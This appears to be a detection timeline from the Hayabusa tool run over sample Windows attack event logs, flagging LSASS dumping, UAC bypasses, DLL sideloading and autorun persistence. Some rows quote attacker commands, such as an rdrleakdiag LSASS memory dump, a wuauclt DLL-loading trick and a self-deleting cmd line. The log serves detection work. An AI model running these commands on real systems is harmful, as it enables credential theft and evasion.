-2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.571 